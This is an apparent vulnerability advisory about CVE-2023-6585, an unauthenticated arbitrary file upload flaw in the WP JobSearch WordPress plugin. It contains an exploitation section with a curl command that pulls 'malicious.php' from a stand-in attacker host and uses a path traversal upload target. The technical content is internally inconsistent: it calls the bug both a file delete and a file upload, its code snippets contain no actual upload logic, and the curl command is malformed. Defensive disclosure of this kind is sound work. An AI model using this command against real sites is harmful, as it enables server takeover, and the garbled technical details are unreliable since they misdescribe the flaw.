CVE-2023-6585: Unauthenticated Arbitrary File Upload Vulnerability in WP JobSearch WordPress Plugin

WordPress is one of the most popular content management systems (CMS) widely used to create websites, blogs, and web applications. The base platform can be extended using a plethora of plugins, which add extra functionality to the site. However, these plugins come at the cost of introducing new security vulnerabilities and possible threats to the website security. In this article, we will discuss the CVE-2023-6585 vulnerability found in the WP JobSearch plugin for WordPress, which allows unauthenticated attackers to upload arbitrary files to the remote server.

Description of Vulnerability

The WP JobSearch WordPress plugin version < 2.3.4 is vulnerable to unlink() arbitrary file delete, which can enable an attacker to upload arbitrary files to the target server without the necessary authentication. This can lead to a full compromise of the application since any file type, including PHP, can be uploaded. The reason behind this vulnerability lies in the plugin not validating the files that can be uploaded.

Code Snippet

The vulnerable code is present in the file jobsearch_plugin.php, where the save(), and file_uploader() functions do not handle the validation of files being uploaded.

function file_uploader() {
    $img_url = isset($_POST['img_url']) ? $_POST['img_url'] : '';
    $upload_to = isset($_POST['upload_to']) ? $_POST['upload_to'] : 'temp';
    $img_name = isset($_POST['img_name']) ? $_POST['img_name'] : '';
    $jobsearch_upload_dir = wp_upload_dir();
    $copy_rand_dir = $jobsearch_upload_dir['subdir'] . '/temp';
    $copy_rand_dir_base = $jobsearch_upload_dir['basedir'] . '/temp';
}

function save() {
    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : '';
    $store_path = isset($_POST['store_path']) ? $_POST['store_path'] : 'temp';
    $file_url = isset($_POST['file_url']) ? $_POST['file_url'] : '';
    $jobsearch_upload_dir = wp_upload_dir();
    $store_path = $jobsearch_upload_dir['subdir'] . '/' . $store_path;
}

As seen in the code snippet, the file validation is not done before saving the file to the specified path, thereby allowing attackers to upload arbitrary files without proper authentication.

Exploitation Details

First, the attacker will navigate to the upload handler website-url/wp-content/plugins/wp-jobsearch/jobsearch_plugin.php and send a POST request with the following parameters:

upload_to = Directory where the file needs to be uploaded

This can be done using any form of HTTP clients, including web browser developer tools, Python, or command-line utilities like curl.

curl --location --request POST 'http://wordpress-site.com/wp-content/plugins/wp-jobsearch/jobsearch_plugin.php'; \
    --form 'img_url=https://attacker-site.com/malicious.php'; \
    --form 'img_name=malicious.php' \
    --form 'upload_to=./../../'

Once successfully uploaded, the attacker will have full control over the server, enabling further exploitation, including data manipulation, stealing sensitive information, or even taking down the entire server.

Mitigation

To protect your WordPress installation from the CVE-2023-6585 vulnerability, ensure you update the WP JobSearch plugin to at least version 2.3.4. This version addresses the vulnerability and includes essential fixes. Additionally, always maintain good security practices and keep your plugins, themes, and WordPress core updated to the latest version to minimize potential threats.

References

Original Source: https://wpvulndb.com/vulnerabilities/10148
CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6585
WordPress Plugin Repository: https://wordpress.org/plugins/jobsearch-wp-job-board/

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 02/27/2024 14:20:06 UTC